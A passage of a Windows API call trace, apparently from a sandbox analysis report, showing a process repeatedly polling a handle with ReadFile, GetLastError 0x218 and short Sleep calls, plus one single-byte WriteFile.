	[0237.356] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.356] GetLastError () returned 0x218
	[0237.356] Sleep (dwMilliseconds=0xa) 
	[0237.372] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.372] GetLastError () returned 0x218
	[0237.372] Sleep (dwMilliseconds=0xa) 
	[0237.418] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.418] GetLastError () returned 0x218
	[0237.418] Sleep (dwMilliseconds=0xa) 
	[0237.464] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.464] GetLastError () returned 0x218
	[0237.464] Sleep (dwMilliseconds=0xa) 
	[0237.508] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0237.508] GetLastError () returned 0x218
	[0237.508] Sleep (dwMilliseconds=0x3e8) 
	[0238.551] WriteFile (in: hFile=0x258, lpBuffer=0x116f4dc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x116f4d4, lpOverlapped=0x0) returned 0
	[0238.551] Sleep (dwMilliseconds=0xa) 
	[0238.583] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.584] GetLastError () returned 0x218
	[0238.584] Sleep (dwMilliseconds=0xa) 
	[0238.587] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.587] GetLastError () returned 0x218
	[0238.587] Sleep (dwMilliseconds=0xa) 
	[0238.603] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.603] GetLastError () returned 0x218
	[0238.603] Sleep (dwMilliseconds=0xa) 
	[0238.619] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.619] GetLastError () returned 0x218
	[0238.619] Sleep (dwMilliseconds=0xa) 
	[0238.637] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.637] GetLastError () returned 0x218
	[0238.637] Sleep (dwMilliseconds=0xa) 
	[0238.650] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.650] GetLastError () returned 0x218
	[0238.650] Sleep (dwMilliseconds=0xa) 
	[0238.666] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.666] GetLastError () returned 0x218
	[0238.666] Sleep (dwMilliseconds=0xa) 
	[0238.683] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.683] GetLastError () returned 0x218
	[0238.683] Sleep (dwMilliseconds=0xa) 
	[0238.728] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.728] GetLastError () returned 0x218
	[0238.728] Sleep (dwMilliseconds=0xa) 
	[0238.776] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.776] GetLastError () returned 0x218
	[0238.776] Sleep (dwMilliseconds=0xa) 
	[0238.819] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.819] GetLastError () returned 0x218
	[0238.819] Sleep (dwMilliseconds=0xa) 
	[0238.822] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.822] GetLastError () returned 0x218
	[0238.822] Sleep (dwMilliseconds=0xa) 
	[0238.838] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.838] GetLastError () returned 0x218
	[0238.838] Sleep (dwMilliseconds=0xa) 
	[0238.853] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.853] GetLastError () returned 0x218
	[0238.853] Sleep (dwMilliseconds=0xa) 
	[0238.869] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.869] GetLastError () returned 0x218
	[0238.869] Sleep (dwMilliseconds=0xa) 
	[0238.885] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.885] GetLastError () returned 0x218
	[0238.885] Sleep (dwMilliseconds=0xa) 
	[0238.900] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.900] GetLastError () returned 0x218
	[0238.900] Sleep (dwMilliseconds=0xa) 
	[0238.916] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.916] GetLastError () returned 0x218
	[0238.916] Sleep (dwMilliseconds=0xa) 
	[0238.962] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0238.962] GetLastError () returned 0x218
	[0238.962] Sleep (dwMilliseconds=0xa) 
	[0239.009] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.009] GetLastError () returned 0x218
	[0239.009] Sleep (dwMilliseconds=0xa) 
	[0239.053] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.053] GetLastError () returned 0x218
	[0239.053] Sleep (dwMilliseconds=0xa) 
	[0239.056] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.056] GetLastError () returned 0x218
	[0239.056] Sleep (dwMilliseconds=0xa) 
	[0239.071] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.071] GetLastError () returned 0x218
	[0239.071] Sleep (dwMilliseconds=0xa) 
	[0239.087] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.088] GetLastError () returned 0x218
	[0239.088] Sleep (dwMilliseconds=0xa) 
	[0239.283] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.283] GetLastError () returned 0x218
	[0239.284] Sleep (dwMilliseconds=0xa) 
	[0239.369] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.369] GetLastError () returned 0x218
	[0239.369] Sleep (dwMilliseconds=0xa) 
	[0239.436] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.437] GetLastError () returned 0x218
	[0239.437] Sleep (dwMilliseconds=0xa) 
	[0239.477] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.477] GetLastError () returned 0x218
	[0239.477] Sleep (dwMilliseconds=0xa) 
	[0239.496] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.496] GetLastError () returned 0x218
	[0239.496] Sleep (dwMilliseconds=0xa) 
	[0239.510] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.510] GetLastError () returned 0x218
	[0239.510] Sleep (dwMilliseconds=0xa) 
	[0239.524] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.524] GetLastError () returned 0x218
	[0239.524] Sleep (dwMilliseconds=0xa) 
	[0239.540] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.540] GetLastError () returned 0x218
	[0239.540] Sleep (dwMilliseconds=0xa) 
	[0239.588] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.588] GetLastError () returned 0x218
	[0239.588] Sleep (dwMilliseconds=0xa) 
	[0239.633] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.633] GetLastError () returned 0x218
	[0239.633] Sleep (dwMilliseconds=0xa) 
	[0239.726] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.726] GetLastError () returned 0x218
	[0239.726] Sleep (dwMilliseconds=0xa) 
	[0239.820] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.820] GetLastError () returned 0x218
	[0239.820] Sleep (dwMilliseconds=0xa) 
	[0239.890] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.890] GetLastError () returned 0x218
	[0239.890] Sleep (dwMilliseconds=0xa) 
	[0239.944] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.944] GetLastError () returned 0x218
	[0239.944] Sleep (dwMilliseconds=0xa) 
	[0239.991] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0239.991] GetLastError () returned 0x218
	[0239.991] Sleep (dwMilliseconds=0xa) 
	[0240.079] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.079] GetLastError () returned 0x218
	[0240.079] Sleep (dwMilliseconds=0xa) 
	[0240.166] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.166] GetLastError () returned 0x218
	[0240.166] Sleep (dwMilliseconds=0xa) 
	[0240.262] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.262] GetLastError () returned 0x218
	[0240.262] Sleep (dwMilliseconds=0xa) 
	[0240.305] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.305] GetLastError () returned 0x218
	[0240.305] Sleep (dwMilliseconds=0xa) 
	[0240.363] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.363] GetLastError () returned 0x218
	[0240.363] Sleep (dwMilliseconds=0xa) 
	[0240.387] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.387] GetLastError () returned 0x218
	[0240.387] Sleep (dwMilliseconds=0xa) 
	[0240.442] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.442] GetLastError () returned 0x218
	[0240.442] Sleep (dwMilliseconds=0xa) 
	[0240.479] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.479] GetLastError () returned 0x218
	[0240.480] Sleep (dwMilliseconds=0xa) 
	[0240.524] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.524] GetLastError () returned 0x218
	[0240.524] Sleep (dwMilliseconds=0xa) 
	[0240.550] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.550] GetLastError () returned 0x218
	[0240.550] Sleep (dwMilliseconds=0xa) 
	[0240.579] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.579] GetLastError () returned 0x218
	[0240.579] Sleep (dwMilliseconds=0xa) 
	[0240.584] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.584] GetLastError () returned 0x218
	[0240.584] Sleep (dwMilliseconds=0xa) 
	[0240.599] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.599] GetLastError () returned 0x218
	[0240.599] Sleep (dwMilliseconds=0xa) 
	[0240.615] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.615] GetLastError () returned 0x218
	[0240.615] Sleep (dwMilliseconds=0xa) 
	[0240.631] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.631] GetLastError () returned 0x218
	[0240.631] Sleep (dwMilliseconds=0xa) 
	[0240.647] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.647] GetLastError () returned 0x218
	[0240.647] Sleep (dwMilliseconds=0xa) 
	[0240.693] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.693] GetLastError () returned 0x218
	[0240.693] Sleep (dwMilliseconds=0xa) 
	[0240.740] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.740] GetLastError () returned 0x218
	[0240.740] Sleep (dwMilliseconds=0xa) 
	[0240.786] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.786] GetLastError () returned 0x218
	[0240.786] Sleep (dwMilliseconds=0xa) 
	[0240.786] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.786] GetLastError () returned 0x218
	[0240.787] Sleep (dwMilliseconds=0xa) 
	[0240.802] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.802] GetLastError () returned 0x218
	[0240.802] Sleep (dwMilliseconds=0xa) 
	[0240.818] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.818] GetLastError () returned 0x218
	[0240.818] Sleep (dwMilliseconds=0xa) 
	[0240.834] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.834] GetLastError () returned 0x218
	[0240.834] Sleep (dwMilliseconds=0xa) 
	[0240.849] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.850] GetLastError () returned 0x218
	[0240.850] Sleep (dwMilliseconds=0xa) 
	[0240.865] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.865] GetLastError () returned 0x218
	[0240.865] Sleep (dwMilliseconds=0xa) 
	[0240.881] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.882] GetLastError () returned 0x218
	[0240.882] Sleep (dwMilliseconds=0xa) 
	[0240.927] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.927] GetLastError () returned 0x218
	[0240.927] Sleep (dwMilliseconds=0xa) 
	[0240.974] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0240.974] GetLastError () returned 0x218
	[0240.974] Sleep (dwMilliseconds=0xa) 
	[0241.023] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.023] GetLastError () returned 0x218
	[0241.023] Sleep (dwMilliseconds=0xa) 
	[0241.036] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.036] GetLastError () returned 0x218
	[0241.036] Sleep (dwMilliseconds=0xa) 
	[0241.052] ReadFile (in: hFile=0x258, lpBuffer=0x116f8f4, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x116f4d8, lpOverlapped=0x0 | out: lpBuffer=0x116f8f4, lpNumberOfBytesRead=0x116f4d8*=0x0, lpOverlapped=0x0) returned 0
	[0241.052] GetLastError () returned 0x218
	[0241.052] Sleep (dwMilliseconds=0xa) 
